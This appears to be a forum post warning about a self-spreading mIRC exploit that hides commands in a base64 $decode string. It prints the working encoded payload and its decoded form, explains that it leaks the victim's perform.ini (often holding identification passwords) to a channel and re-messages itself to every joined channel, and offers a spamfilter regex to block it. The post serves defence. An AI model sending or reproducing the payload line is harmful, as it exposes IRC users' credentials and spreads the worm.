The newest form of exploit for mIRC uses $decode.
This exploit is seen as lines that look like this:
Code: Select all
LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:
Code: Select all
//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the persons perform.ini file visible to whoever is on the channel it is played to. Since alot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder Windows tells it. The rest are done as "silent" commands.
Not too good with regex, but here is a try:
Code: Select all
spamfilter {
regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\);"
target channel;
action block;
reason "$decode exploit";
};